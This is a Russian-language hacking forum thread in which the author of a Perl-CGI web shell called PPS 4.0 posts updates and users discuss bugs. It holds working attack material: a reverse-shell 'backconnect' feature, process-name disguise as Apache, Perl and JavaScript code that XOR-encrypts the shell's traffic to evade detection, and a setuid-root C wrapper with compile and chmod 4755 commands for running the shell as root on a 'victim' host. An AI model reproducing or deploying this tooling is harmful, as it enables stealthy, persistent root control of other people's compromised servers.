Старый 08.06.2013, 17:50   #61
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

update:

добавлен backconnect with tty

без создания дополнительных файлов

+ исправление багов

Последний раз редактировалось Pashkela; 08.06.2013 в 18:14..
Pashkela вне форума   Ответить с цитированием
Старый 11.06.2013, 15:10   #62
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

update:

1. Исправлена работа в консоле при $ cd /some_dir
2. Возможность выбора имени шелла при отображении в списке процессов (default="/usr/sbin/apache2 -k start") was "/usr/bin/perl /var/www/pps.pl"
Pashkela вне форума   Ответить с цитированием
Старый 12.07.2013, 08:47   #63
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

update:

XOR encrypt POST with your MD5-key in Console (without COOKIES)
Pashkela вне форума   Ответить с цитированием
Старый 13.07.2013, 01:20   #64
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

ого, а можно отдельно сорцы этого енкрипшона?
12309 вне форума   Ответить с цитированием
Старый 14.07.2013, 17:13   #65
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

да такой же фактически, как и wso, просто переделанный под перл (на перлке декод, на яваскрипт - енкод):

Код:
sub encr{my($str,$pwd)=@_;$pwd=encode_base64($pwd);$str=decode_base64($str);my $strlen=length $str;my $enc_chr="";my $enc_str="";my $i=0;my @chars=split(//, $str);my @chars1=split(//, $pwd);while($i<$strlen){for($j=0;$j<44;$j++){$enc_chr=chr(ord($chars[$i])^ord($chars1[$j]));$enc_str.=$enc_chr;$enc_chr="";$i++;if($i>=$strlen){return decode_base64($enc_str);}}}return decode_base64($enc_str);}
+ javascript:

Код:
function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
Pashkela вне форума   Ответить с цитированием
Старый 14.07.2013, 19:00   #66
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

> Вы должны добавить отзыв кому-то ещё, прежде чем сможете снова добавить его Pashkela.
12309 вне форума   Ответить с цитированием
Старый 16.07.2013, 17:21   #67
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Заметил, что данный шелл при открытии файлов теги превращает в < ?php ? >, < tr > < /tr > и так все теги в файле, тоесть добавляются пробелы, позже сохраняется все в таком же виде. После вот таких вот пробелов сайт перестал работать.
- Проблема возникает только у меня или это баг?
cat1vo вне форума   Ответить с цитированием
Старый 16.07.2013, 18:59   #68
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Заметил, что данный шелл при открытии файлов теги превращает в < ?php ? >, < tr > < /tr > и так все теги в файле, тоесть добавляются пробелы
так и есть, чтобы html код не исполнялся и файло отображалось, а не выполнялось. Потом, при сохранении, все встает на свои места, т.е. пробелы убираются. Так что причина

Цитата:
После вот таких вот пробелов сайт перестал работать
в чем-то другом. Любые файлы из этого шелла можно редактировать, кроме самого себя
Pashkela вне форума   Ответить с цитированием
Старый 18.02.2014, 13:53   #69
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию Run PPS 4.0 perl-cgi web shell as ROOT

If you have owned system and your uid=0(root) then you can browse and edit files and use console as root:

make file suid_perl.c:

Код:
#include < stdio.h >
#include < stdlib.h >
#include < sys/types.h >
#include < unistd.h >

int main()
{
   setuid( 0 );
   system( "perl /var/www/pps.pl" );

   return 0;
}
and:

Код:
$ gcc /var/www/suid_perl.c -o /var/www/suid_perl.pl
$ chown 0:33 /var/www/suid_perl.pl
$ chmod 4755 /var/www/suid_perl.pl
Now you access the C wrapper as http://victim/suid_perl.pl, which just calls 'pps.pl' with the suid flag set.
That's it!

PS: without any changes to pps.pl

Последний раз редактировалось Pashkela; 18.02.2014 в 13:57..
Pashkela вне форума   Ответить с цитированием
Старый 14.09.2014, 14:50   #70
ewi
 
Регистрация: 02.04.2014
Сообщений: 75
Репутация: 2
По умолчанию

Цитата:
Сообщение от cat1vo Посмотреть сообщение
Заметил, что данный шелл при открытии файлов теги превращает в < ?php ? >, < tr > < /tr >...
Цитата:
Сообщение от Pashkela Посмотреть сообщение
так и есть, чтобы html код не исполнялся и файло отображалось, а не выполнялось. Потом, при сохранении, все встает на свои места, т.е. пробелы убираются. Так что причина в чем-то другом. Любые файлы из этого шелла можно редактировать, кроме самого себя
Кстати, есть ситуации, в которых код реально может сохраниться некорректно. Случай редкий, но вероятный:
Код:
<html><body>point А < point B > point С</body></html>
при обратном преобразовании, получим

Код:
<html><body>point А <point B> point С</body></html>
html страница отобразится уже в таком виде:

Код:
point А point С
Видимо cat1vo имел ввиду вдобавок ещё и неудобство в просмотре кода. Баг можно исправить, делается так:

PHP код:
sub HtmlSpecialChars($){my ($st)=@_;$st=~s|<|< |g;$st=~s|>| >|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|< |<|g;$st=~s| >|>|g
-->
PHP код:
sub HtmlSpecialChars($){my ($st)=@_;$st=~s|&lt;|&amp;lt;|g;$st=~s|&gt;|&amp;gt;|g;$st=~s|<|&lt;|g;$st=~s|>|&gt;|g;return $st;} 
саб DeHtmlSpecialChars уже не нужен, поэтому:

PHP код:
open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF); 
-->
PHP код:
open(FFF,"> $ffpath");print FFF $fccode;close(FFF); 
Результат:
Цитата:
< ?php ? >, < tr > < /tr >
-->
Цитата:
<?php ?>, <tr> </tr>
Правка файла при этом остаётся корректной

Последний раз редактировалось ewi; 20.09.2014 в 11:19.. Причина: добавил
ewi вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot